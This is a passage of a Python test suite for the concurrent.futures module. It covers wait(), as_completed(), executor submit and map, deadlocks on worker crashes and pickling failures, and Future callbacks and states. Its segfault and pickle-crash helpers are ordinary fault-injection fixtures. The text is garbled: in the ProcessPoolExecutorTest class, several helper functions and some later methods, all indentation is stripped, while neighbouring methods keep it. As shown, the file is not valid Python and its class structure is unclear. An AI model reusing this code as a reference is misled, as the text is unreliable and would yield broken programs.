                return_when=futures.FIRST_COMPLETED)
        self.assertEqual(set([future1]), done)
        self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
    def test_first_completed_some_already_completed(self):
        future1 = self.executor.submit(time.sleep, 1.5)
        finished, pending = futures.wait(
                 [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
                 return_when=futures.FIRST_COMPLETED)
        self.assertEqual(
                set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
                finished)
        self.assertEqual(set([future1]), pending)
    def test_first_exception(self):
        future1 = self.executor.submit(mul, 2, 21)
        future2 = self.executor.submit(sleep_and_raise, 1.5)
        future3 = self.executor.submit(time.sleep, 3)
        finished, pending = futures.wait(
                [future1, future2, future3],
                return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([future1, future2]), finished)
        self.assertEqual(set([future3]), pending)
    def test_first_exception_some_already_complete(self):
        future1 = self.executor.submit(divmod, 21, 0)
        future2 = self.executor.submit(time.sleep, 1.5)
        finished, pending = futures.wait(
                [SUCCESSFUL_FUTURE,
                 CANCELLED_FUTURE,
                 CANCELLED_AND_NOTIFIED_FUTURE,
                 future1, future2],
                return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([SUCCESSFUL_FUTURE,
                              CANCELLED_AND_NOTIFIED_FUTURE,
                              future1]), finished)
        self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
    def test_first_exception_one_already_failed(self):
        future1 = self.executor.submit(time.sleep, 2)
        finished, pending = futures.wait(
                 [EXCEPTION_FUTURE, future1],
                 return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([EXCEPTION_FUTURE]), finished)
        self.assertEqual(set([future1]), pending)
    def test_all_completed(self):
        future1 = self.executor.submit(divmod, 2, 0)
        future2 = self.executor.submit(mul, 2, 21)
        finished, pending = futures.wait(
                [SUCCESSFUL_FUTURE,
                 CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 future1,
                 future2],
                return_when=futures.ALL_COMPLETED)
        self.assertEqual(set([SUCCESSFUL_FUTURE,
                              CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              future1,
                              future2]), finished)
        self.assertEqual(set(), pending)
    def test_timeout(self):
        future1 = self.executor.submit(mul, 6, 7)
        future2 = self.executor.submit(time.sleep, 6)
        finished, pending = futures.wait(
                [CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 SUCCESSFUL_FUTURE,
                 future1, future2],
                timeout=5,
                return_when=futures.ALL_COMPLETED)
        self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              SUCCESSFUL_FUTURE,
                              future1]), finished)
        self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
    """Thread-pool specific wait() regression tests."""
    def test_pending_calls_race(self):
        # Issue #14406: multi-threaded race condition when waiting on all
        # futures.
        event = threading.Event()
        def future_func():
            event.wait()
        oldswitchinterval = sys.getswitchinterval()
        # Force very frequent thread switches to provoke the race.
        sys.setswitchinterval(1e-6)
        try:
            fs = {self.executor.submit(future_func) for i in range(100)}
            event.set()
            futures.wait(fs, return_when=futures.ALL_COMPLETED)
        finally:
            sys.setswitchinterval(oldswitchinterval)
# Generic wait() tests for the process-pool flavours (threads get the
# dedicated ThreadPoolWaitTests subclass above).
create_executor_tests(WaitTests,
                      executor_mixins=(ProcessPoolForkMixin,
                                       ProcessPoolForkserverMixin,
                                       ProcessPoolSpawnMixin))
class AsCompletedTests:
    """Tests for futures.as_completed() shared across executor types."""
    # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
    def test_no_timeout(self):
        future1 = self.executor.submit(mul, 2, 21)
        future2 = self.executor.submit(mul, 7, 6)
        completed = set(futures.as_completed(
                [CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 SUCCESSFUL_FUTURE,
                 future1, future2]))
        self.assertEqual(set(
                [CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 SUCCESSFUL_FUTURE,
                 future1, future2]),
                completed)
    def test_zero_timeout(self):
        future1 = self.executor.submit(time.sleep, 2)
        completed_futures = set()
        try:
            for future in futures.as_completed(
                    [CANCELLED_AND_NOTIFIED_FUTURE,
                     EXCEPTION_FUTURE,
                     SUCCESSFUL_FUTURE,
                     future1],
                    timeout=0):
                completed_futures.add(future)
        except futures.TimeoutError:
            pass
        self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              SUCCESSFUL_FUTURE]),
                         completed_futures)
    def test_duplicate_futures(self):
        # Issue 20367. Duplicate futures should not raise exceptions or give
        # duplicate responses.
        # Issue #31641: accept arbitrary iterables.
        future1 = self.executor.submit(time.sleep, 2)
        completed = [
            f for f in futures.as_completed(itertools.repeat(future1, 3))
        ]
        self.assertEqual(len(completed), 1)
    def test_free_reference_yielded_future(self):
        # Issue #14406: Generator should not keep references
        # to finished futures.
        futures_list = [Future() for _ in range(8)]
        futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
        futures_list.append(create_future(state=FINISHED, result=42))
        with self.assertRaises(futures.TimeoutError):
            for future in futures.as_completed(futures_list, timeout=0):
                futures_list.remove(future)
                wr = weakref.ref(future)
                del future
                support.gc_collect()  # For PyPy or other GCs.
                self.assertIsNone(wr())
        futures_list[0].set_result("test")
        for future in futures.as_completed(futures_list):
            futures_list.remove(future)
            wr = weakref.ref(future)
            del future
            support.gc_collect()  # For PyPy or other GCs.
            self.assertIsNone(wr())
            if futures_list:
                futures_list[0].set_result("test")
    def test_correct_timeout_exception_msg(self):
        futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
                        RUNNING_FUTURE, SUCCESSFUL_FUTURE]
        with self.assertRaises(futures.TimeoutError) as cm:
            list(futures.as_completed(futures_list, timeout=0))
        self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
# Run the as_completed() tests under every executor flavour.
create_executor_tests(AsCompletedTests)
class ExecutorTest:
    """Core submit()/map() behaviour shared by all executor types."""
    # Executor.shutdown() and context manager usage is tested by
    # ExecutorShutdownTest.
    def test_submit(self):
        future = self.executor.submit(pow, 2, 8)
        self.assertEqual(256, future.result())
    def test_submit_keyword(self):
        future = self.executor.submit(mul, 2, y=8)
        self.assertEqual(16, future.result())
        # 'self' and 'fn' must be forwarded to the callable, not swallowed
        # by Executor.submit()'s own signature.
        future = self.executor.submit(capture, 1, self=2, fn=3)
        self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
        with self.assertRaises(TypeError):
            self.executor.submit(fn=capture, arg=1)
        with self.assertRaises(TypeError):
            self.executor.submit(arg=1)
    def test_map(self):
        self.assertEqual(
                list(self.executor.map(pow, range(10), range(10))),
                list(map(pow, range(10), range(10))))
        self.assertEqual(
                list(self.executor.map(pow, range(10), range(10), chunksize=3)),
                list(map(pow, range(10), range(10))))
    def test_map_exception(self):
        i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
        self.assertEqual(i.__next__(), (0, 1))
        self.assertEqual(i.__next__(), (0, 1))
        self.assertRaises(ZeroDivisionError, i.__next__)
    def test_map_timeout(self):
        results = []
        try:
            for i in self.executor.map(time.sleep,
                                       [0, 0, 6],
                                       timeout=5):
                results.append(i)
        except futures.TimeoutError:
            pass
        else:
            self.fail('expected TimeoutError')
        self.assertEqual([None, None], results)
    def test_shutdown_race_issue12456(self):
        # Issue #12456: race condition at shutdown where trying to post a
        # sentinel in the call queue blocks (the queue is full while processes
        # have exited).
        self.executor.map(str, [2] * (self.worker_count + 1))
        self.executor.shutdown()
    @support.cpython_only
    def test_no_stale_references(self):
        # Issue #16284: check that the executors don't unnecessarily hang onto
        # references.
        my_object = MyObject()
        my_object_collected = threading.Event()
        my_object_callback = weakref.ref(
            my_object, lambda obj: my_object_collected.set())
        # Deliberately discarding the future.
        self.executor.submit(my_object.my_method)
        del my_object
        collected = my_object_collected.wait(timeout=support.SHORT_TIMEOUT)
        self.assertTrue(collected,
                        "Stale reference not collected within timeout.")
    def test_max_workers_negative(self):
        for number in (0, -1):
            with self.assertRaisesRegex(ValueError,
                                        "max_workers must be greater "
                                        "than 0"):
                self.executor_type(max_workers=number)
    def test_free_reference(self):
        # Issue #14406: Result iterator should not keep an internal
        # reference to result objects.
        for obj in self.executor.map(make_dummy_object, range(10)):
            wr = weakref.ref(obj)
            del obj
            support.gc_collect()  # For PyPy or other GCs.
            self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
    """Thread-pool specific executor behaviour."""
    def test_map_submits_without_iteration(self):
        """Tests verifying issue 11777."""
        finished = []
        def record_finished(n):
            finished.append(n)
        self.executor.map(record_finished, range(10))
        self.executor.shutdown(wait=True)
        self.assertCountEqual(finished, range(10))
    def test_default_workers(self):
        executor = self.executor_type()
        # Default worker count formula documented for ThreadPoolExecutor.
        expected = min(32, (os.cpu_count() or 1) + 4)
        self.assertEqual(executor._max_workers, expected)
    def test_saturation(self):
        # A saturated pool must not spawn more than max_workers threads.
        executor = self.executor_type(4)
        def acquire_lock(lock):
            lock.acquire()
        sem = threading.Semaphore(0)
        for i in range(15 * executor._max_workers):
            executor.submit(acquire_lock, sem)
        self.assertEqual(len(executor._threads), executor._max_workers)
        for i in range(15 * executor._max_workers):
            sem.release()
        executor.shutdown(wait=True)
    def test_idle_thread_reuse(self):
        # Sequential jobs should all run on one reused idle thread.
        executor = self.executor_type()
        executor.submit(mul, 21, 2).result()
        executor.submit(mul, 6, 7).result()
        executor.submit(mul, 3, 14).result()
        self.assertEqual(len(executor._threads), 1)
        executor.shutdown(wait=True)
    @unittest.skipUnless(hasattr(os, 'register_at_fork'), 'need os.register_at_fork')
    def test_hang_global_shutdown_lock(self):
        # bpo-45021: _global_shutdown_lock should be reinitialized in the child
        # process, otherwise it will never exit
        def submit(pool):
            pool.submit(submit, pool)
        with futures.ThreadPoolExecutor(1) as pool:
            pool.submit(submit, pool)
            for _ in range(50):
                with futures.ProcessPoolExecutor(1, mp_context=mp.get_context('fork')) as workers:
                    workers.submit(tuple)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@hashlib_helper.requires_hashdigest('md5')
def test_ressources_gced_in_workers(self):
# Ensure that argument for a job are correctly gc-ed after the job
# is finished
mgr = self.get_context().Manager()
obj = EventfulGCObj(mgr)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
# explicitly destroy the object to ensure that EventfulGCObj.__del__()
# is called while manager is still running.
obj = None
support.gc_collect()
mgr.shutdown()
mgr.join()
def test_saturation(self):
executor = self.executor
mp_context = self.get_context()
sem = mp_context.Semaphore(0)
job_count = 15 * executor._max_workers
for _ in range(job_count):
executor.submit(sem.acquire)
self.assertEqual(len(executor._processes), executor._max_workers)
for _ in range(job_count):
sem.release()
    def test_idle_process_reuse_one(self):
        # Sequential, waited-on jobs should be served by a single reused
        # idle worker rather than spawning a new process per job.
        executor = self.executor
        assert executor._max_workers >= 4
        if self.get_context().get_start_method(allow_none=False) == "fork":
            raise unittest.SkipTest("Incompatible with the fork start method.")
        executor.submit(mul, 21, 2).result()
        executor.submit(mul, 6, 7).result()
        executor.submit(mul, 3, 14).result()
        self.assertEqual(len(executor._processes), 1)
    def test_idle_process_reuse_multiple(self):
        # Interleaving waited and un-waited submissions should still keep
        # the spawned-worker count well below _max_workers, because idle
        # workers are reused for the next submission.
        executor = self.executor
        assert executor._max_workers <= 5
        if self.get_context().get_start_method(allow_none=False) == "fork":
            raise unittest.SkipTest("Incompatible with the fork start method.")
        executor.submit(mul, 12, 7).result()
        executor.submit(mul, 33, 25)
        executor.submit(mul, 25, 26).result()
        executor.submit(mul, 18, 29)
        executor.submit(mul, 1, 2).result()
        executor.submit(mul, 0, 9)
        self.assertLessEqual(len(executor._processes), 3)
        executor.shutdown()
    def test_max_tasks_per_child(self):
        # A worker must be retired and replaced after serving
        # max_tasks_per_child tasks.
        context = self.get_context()
        if context.get_start_method(allow_none=False) == "fork":
            # max_tasks_per_child is rejected outright with "fork".
            with self.assertRaises(ValueError):
                self.executor_type(1, mp_context=context, max_tasks_per_child=3)
            return
        # not using self.executor as we need to control construction.
        # arguably this could go in another class w/o that mixin.
        executor = self.executor_type(
            1, mp_context=context, max_tasks_per_child=3)
        f1 = executor.submit(os.getpid)
        original_pid = f1.result()
        # The worker pid remains the same as the worker could be reused
        f2 = executor.submit(os.getpid)
        self.assertEqual(f2.result(), original_pid)
        self.assertEqual(len(executor._processes), 1)
        f3 = executor.submit(os.getpid)
        self.assertEqual(f3.result(), original_pid)

        # A new worker is spawned, with a statistically different pid,
        # while the previous was reaped.
        f4 = executor.submit(os.getpid)
        new_pid = f4.result()
        self.assertNotEqual(original_pid, new_pid)
        self.assertEqual(len(executor._processes), 1)

        executor.shutdown()
def test_max_tasks_per_child_defaults_to_spawn_context(self):
# not using self.executor as we need to control construction.
# arguably this could go in another class w/o that mixin.
executor = self.executor_type(1, max_tasks_per_child=3)
self.assertEqual(executor._mp_context.get_start_method(), "spawn")
def test_max_tasks_early_shutdown(self):
context = self.get_context()
if context.get_start_method(allow_none=False) == "fork":
raise unittest.SkipTest("Incompatible with the fork start method.")
# not using self.executor as we need to control construction.
# arguably this could go in another class w/o that mixin.
executor = self.executor_type(
3, mp_context=context, max_tasks_per_child=1)
futures = []
for i in range(6):
futures.append(executor.submit(mul, i, i))
executor.shutdown()
for i, future in enumerate(futures):
self.assertEqual(future.result(), mul(i, i))
# Generate a concrete TestCase per start method (fork, forkserver, spawn)
# from the shared ProcessPoolExecutorTest body.
create_executor_tests(ProcessPoolExecutorTest,
                      executor_mixins=(ProcessPoolForkMixin,
                                       ProcessPoolForkserverMixin,
                                       ProcessPoolSpawnMixin))
def _crash(delay=None):
    """Crash the current process with a segfault, optionally after *delay* seconds."""
    import faulthandler
    if delay:
        time.sleep(delay)
    # Disable the handler first so the segfault is fatal rather than reported.
    faulthandler.disable()
    faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
raise Err()
def _raise_error_ignore_stderr(Err):
"""Function that raises an Exception in process and ignores stderr."""
import io
sys.stderr = io.StringIO()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
return cls()
class CrashAtPickle(object):
    """Object whose pickling segfaults the process."""
    def __reduce__(self):
        # pickle.dumps() calls this; crashing here simulates a process that
        # dies while serializing.
        _crash()
class CrashAtUnpickle(object):
    """Object whose unpickling segfaults the process."""
    def __reduce__(self):
        # Reconstruction on the receiving side calls _crash().
        return (_crash, ())
class ExitAtPickle(object):
    """Object whose pickling exits the process with code 1."""
    def __reduce__(self):
        # pickle.dumps() calls this; exiting here simulates a process that
        # terminates while serializing.
        _exit()
class ExitAtUnpickle(object):
    """Object whose unpickling exits the process with code 1."""
    def __reduce__(self):
        # Reconstruction on the receiving side calls _exit().
        return (_exit, ())
class ErrorAtPickle(object):
    """Object whose pickling raises PicklingError."""
    def __reduce__(self):
        import pickle
        raise pickle.PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
    """Object whose unpickling raises UnpicklingError (with stderr silenced)."""
    def __reduce__(self):
        from pickle import UnpicklingError
        # The receiving side re-raises via the stderr-silencing helper.
        return (_raise_error_ignore_stderr, (UnpicklingError,))
class ExecutorDeadlockTest:
    """Mixin verifying that worker crashes, exits and (un)pickling failures
    surface as exceptions instead of deadlocking the executor.

    Each test_* method induces a failure at a different stage of the task
    pipeline (task pickle, task unpickle, func execution, result pickle,
    result unpickle) via the CrashAt*/ExitAt*/ErrorAt* helper objects.
    """
    TIMEOUT = support.SHORT_TIMEOUT

    def _fail_on_deadlock(self, executor):
        # If we did not recover before TIMEOUT seconds, consider that the
        # executor is in a deadlock state and forcefully clean all its
        # components.
        import faulthandler
        from tempfile import TemporaryFile
        with TemporaryFile(mode="w+") as f:
            faulthandler.dump_traceback(file=f)
            f.seek(0)
            tb = f.read()
        for p in executor._processes.values():
            p.terminate()
        # This should be safe to call executor.shutdown here as all possible
        # deadlocks should have been broken.
        executor.shutdown(wait=True)
        print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
        self.fail(f"Executor deadlock:\n\n{tb}")

    def _check_crash(self, error, func, *args, ignore_stderr=False):
        # test for deadlock caused by crashes in a pool
        self.executor.shutdown(wait=True)

        executor = self.executor_type(
            max_workers=2, mp_context=self.get_context())
        res = executor.submit(func, *args)

        # Optionally swallow the worker's stderr output during the failure.
        if ignore_stderr:
            cm = support.captured_stderr()
        else:
            cm = contextlib.nullcontext()

        try:
            with self.assertRaises(error):
                with cm:
                    res.result(timeout=self.TIMEOUT)
        except futures.TimeoutError:
            # If we did not recover before TIMEOUT seconds,
            # consider that the executor is in a deadlock state
            self._fail_on_deadlock(executor)
        executor.shutdown(wait=True)

    def test_error_at_task_pickle(self):
        # Check problem occurring while pickling a task in
        # the task_handler thread
        self._check_crash(PicklingError, id, ErrorAtPickle())

    def test_exit_at_task_unpickle(self):
        # Check problem occurring while unpickling a task on workers
        self._check_crash(BrokenProcessPool, id, ExitAtUnpickle())

    def test_error_at_task_unpickle(self):
        # Check problem occurring while unpickling a task on workers
        self._check_crash(BrokenProcessPool, id, ErrorAtUnpickle())

    def test_crash_at_task_unpickle(self):
        # Check problem occurring while unpickling a task on workers
        self._check_crash(BrokenProcessPool, id, CrashAtUnpickle())

    def test_crash_during_func_exec_on_worker(self):
        # Check problem occurring during func execution on workers
        self._check_crash(BrokenProcessPool, _crash)

    def test_exit_during_func_exec_on_worker(self):
        # Check problem occurring during func execution on workers
        self._check_crash(SystemExit, _exit)

    def test_error_during_func_exec_on_worker(self):
        # Check problem occurring during func execution on workers
        self._check_crash(RuntimeError, _raise_error, RuntimeError)

    def test_crash_during_result_pickle_on_worker(self):
        # Check problem occurring while pickling a task result
        # on workers
        self._check_crash(BrokenProcessPool, _return_instance, CrashAtPickle)

    def test_exit_during_result_pickle_on_worker(self):
        # Check problem occurring while pickling a task result
        # on workers
        self._check_crash(SystemExit, _return_instance, ExitAtPickle)

    def test_error_during_result_pickle_on_worker(self):
        # Check problem occurring while pickling a task result
        # on workers
        self._check_crash(PicklingError, _return_instance, ErrorAtPickle)

    def test_error_during_result_unpickle_in_result_handler(self):
        # Check problem occurring while unpickling a task in
        # the result_handler thread
        self._check_crash(BrokenProcessPool,
                          _return_instance, ErrorAtUnpickle,
                          ignore_stderr=True)

    def test_exit_during_result_unpickle_in_result_handler(self):
        # Check problem occurring while unpickling a task in
        # the result_handler thread
        self._check_crash(BrokenProcessPool, _return_instance, ExitAtUnpickle)

    def test_shutdown_deadlock(self):
        # Test that the pool calling shutdown do not cause deadlock
        # if a worker fails after the shutdown call.
        self.executor.shutdown(wait=True)
        with self.executor_type(max_workers=2,
                                mp_context=self.get_context()) as executor:
            self.executor = executor  # Allow clean up in fail_on_deadlock
            f = executor.submit(_crash, delay=.1)
            executor.shutdown(wait=True)
            with self.assertRaises(BrokenProcessPool):
                f.result()

    def test_shutdown_deadlock_pickle(self):
        # Test that the pool calling shutdown with wait=False does not cause
        # a deadlock if a task fails at pickle after the shutdown call.
        # Reported in bpo-39104.
        self.executor.shutdown(wait=True)
        with self.executor_type(max_workers=2,
                                mp_context=self.get_context()) as executor:
            self.executor = executor  # Allow clean up in fail_on_deadlock

            # Start the executor and get the executor_manager_thread to collect
            # the threads and avoid dangling thread that should be cleaned up
            # asynchronously.
            executor.submit(id, 42).result()
            executor_manager = executor._executor_manager_thread

            # Submit a task that fails at pickle and shutdown the executor
            # without waiting
            f = executor.submit(id, ErrorAtPickle())
            executor.shutdown(wait=False)
            with self.assertRaises(PicklingError):
                f.result()

        # Make sure the executor is eventually shutdown and do not leave
        # dangling threads
        executor_manager.join()
# Generate a concrete deadlock TestCase per start method from the shared
# ExecutorDeadlockTest body.
create_executor_tests(ExecutorDeadlockTest,
                      executor_mixins=(ProcessPoolForkMixin,
                                       ProcessPoolForkserverMixin,
                                       ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
    """Unit tests for Future: done-callbacks, repr, state transitions,
    cancellation, and result/exception retrieval (with and without timeouts).
    """

    def test_done_callback_with_result(self):
        # Callback added before completion fires on set_result().
        callback_result = None
        def fn(callback_future):
            nonlocal callback_result
            callback_result = callback_future.result()

        f = Future()
        f.add_done_callback(fn)
        f.set_result(5)
        self.assertEqual(5, callback_result)

    def test_done_callback_with_exception(self):
        callback_exception = None
        def fn(callback_future):
            nonlocal callback_exception
            callback_exception = callback_future.exception()

        f = Future()
        f.add_done_callback(fn)
        f.set_exception(Exception('test'))
        self.assertEqual(('test',), callback_exception.args)

    def test_done_callback_with_cancel(self):
        was_cancelled = None
        def fn(callback_future):
            nonlocal was_cancelled
            was_cancelled = callback_future.cancelled()

        f = Future()
        f.add_done_callback(fn)
        self.assertTrue(f.cancel())
        self.assertTrue(was_cancelled)

    def test_done_callback_raises(self):
        # A raising callback is logged to stderr and must not prevent later
        # callbacks from running.
        with support.captured_stderr() as stderr:
            raising_was_called = False
            fn_was_called = False

            def raising_fn(callback_future):
                nonlocal raising_was_called
                raising_was_called = True
                raise Exception('doh!')

            def fn(callback_future):
                nonlocal fn_was_called
                fn_was_called = True

            f = Future()
            f.add_done_callback(raising_fn)
            f.add_done_callback(fn)
            f.set_result(5)
            self.assertTrue(raising_was_called)
            self.assertTrue(fn_was_called)
            self.assertIn('Exception: doh!', stderr.getvalue())

    def test_done_callback_already_successful(self):
        # Callback added after completion runs immediately.
        callback_result = None
        def fn(callback_future):
            nonlocal callback_result
            callback_result = callback_future.result()

        f = Future()
        f.set_result(5)
        f.add_done_callback(fn)
        self.assertEqual(5, callback_result)

    def test_done_callback_already_failed(self):
        callback_exception = None
        def fn(callback_future):
            nonlocal callback_exception
            callback_exception = callback_future.exception()

        f = Future()
        f.set_exception(Exception('test'))
        f.add_done_callback(fn)
        self.assertEqual(('test',), callback_exception.args)

    def test_done_callback_already_cancelled(self):
        was_cancelled = None
        def fn(callback_future):
            nonlocal was_cancelled
            was_cancelled = callback_future.cancelled()

        f = Future()
        self.assertTrue(f.cancel())
        f.add_done_callback(fn)
        self.assertTrue(was_cancelled)

    def test_done_callback_raises_already_succeeded(self):
        # Exceptions from an immediately-run callback are reported via a
        # different message than deferred callbacks.
        with support.captured_stderr() as stderr:
            def raising_fn(callback_future):
                raise Exception('doh!')

            f = Future()

            # Set the result first to simulate a future that runs instantly,
            # effectively allowing the callback to be run immediately.
            f.set_result(5)
            f.add_done_callback(raising_fn)

            self.assertIn('exception calling callback for', stderr.getvalue())
            self.assertIn('doh!', stderr.getvalue())

    def test_repr(self):
        self.assertRegex(repr(PENDING_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=pending>')
        self.assertRegex(repr(RUNNING_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=running>')
        self.assertRegex(repr(CANCELLED_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=cancelled>')
        self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=cancelled>')
        self.assertRegex(
            repr(EXCEPTION_FUTURE),
            '<Future at 0x[0-9a-f]+ state=finished raised OSError>')
        self.assertRegex(
            repr(SUCCESSFUL_FUTURE),
            '<Future at 0x[0-9a-f]+ state=finished returned int>')

    def test_cancel(self):
        # Only pending futures are cancellable; running/finished ones refuse.
        f1 = create_future(state=PENDING)
        f2 = create_future(state=RUNNING)
        f3 = create_future(state=CANCELLED)
        f4 = create_future(state=CANCELLED_AND_NOTIFIED)
        f5 = create_future(state=FINISHED, exception=OSError())
        f6 = create_future(state=FINISHED, result=5)

        self.assertTrue(f1.cancel())
        self.assertEqual(f1._state, CANCELLED)

        self.assertFalse(f2.cancel())
        self.assertEqual(f2._state, RUNNING)

        self.assertTrue(f3.cancel())
        self.assertEqual(f3._state, CANCELLED)

        self.assertTrue(f4.cancel())
        self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)

        self.assertFalse(f5.cancel())
        self.assertEqual(f5._state, FINISHED)

        self.assertFalse(f6.cancel())
        self.assertEqual(f6._state, FINISHED)

    def test_cancelled(self):
        self.assertFalse(PENDING_FUTURE.cancelled())
        self.assertFalse(RUNNING_FUTURE.cancelled())
        self.assertTrue(CANCELLED_FUTURE.cancelled())
        self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
        self.assertFalse(EXCEPTION_FUTURE.cancelled())
        self.assertFalse(SUCCESSFUL_FUTURE.cancelled())

    def test_done(self):
        self.assertFalse(PENDING_FUTURE.done())
        self.assertFalse(RUNNING_FUTURE.done())
        self.assertTrue(CANCELLED_FUTURE.done())
        self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
        self.assertTrue(EXCEPTION_FUTURE.done())
        self.assertTrue(SUCCESSFUL_FUTURE.done())

    def test_running(self):
        self.assertFalse(PENDING_FUTURE.running())
        self.assertTrue(RUNNING_FUTURE.running())
        self.assertFalse(CANCELLED_FUTURE.running())
        self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
        self.assertFalse(EXCEPTION_FUTURE.running())
        self.assertFalse(SUCCESSFUL_FUTURE.running())

    def test_result_with_timeout(self):
        # timeout=0 means "don't wait": unfinished futures time out at once.
        self.assertRaises(futures.TimeoutError,
                          PENDING_FUTURE.result, timeout=0)
        self.assertRaises(futures.TimeoutError,
                          RUNNING_FUTURE.result, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_FUTURE.result, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
        self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
        self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)

    def test_result_with_success(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
        def notification():
            # Wait until the main thread is waiting for the result.
            time.sleep(1)
            f1.set_result(42)

        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()

        self.assertEqual(f1.result(timeout=5), 42)
        t.join()

    def test_result_with_cancel(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
        def notification():
            # Wait until the main thread is waiting for the result.
            time.sleep(1)
            f1.cancel()

        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()

        self.assertRaises(futures.CancelledError,
                          f1.result, timeout=support.SHORT_TIMEOUT)
        t.join()

    def test_exception_with_timeout(self):
        self.assertRaises(futures.TimeoutError,
                          PENDING_FUTURE.exception, timeout=0)
        self.assertRaises(futures.TimeoutError,
                          RUNNING_FUTURE.exception, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_FUTURE.exception, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
        self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
                                   OSError))
        self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)

    def test_exception_with_success(self):
        def notification():
            # Wait until the main thread is waiting for the exception.
            time.sleep(1)
            # Finish the future by hand, holding its condition variable.
            with f1._condition:
                f1._state = FINISHED
                f1._exception = OSError()
                f1._condition.notify_all()

        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()

        self.assertTrue(isinstance(f1.exception(timeout=support.SHORT_TIMEOUT), OSError))
        t.join()

    def test_multiple_set_result(self):
        # A finished future rejects a second set_result().
        f = create_future(state=PENDING)
        f.set_result(1)

        with self.assertRaisesRegex(
                futures.InvalidStateError,
                'FINISHED: <Future at 0x[0-9a-f]+ '
                'state=finished returned int>'
        ):
            f.set_result(2)

        self.assertTrue(f.done())
        self.assertEqual(f.result(), 1)

    def test_multiple_set_exception(self):
        # A finished future rejects a second set_exception().
        f = create_future(state=PENDING)
        e = ValueError()
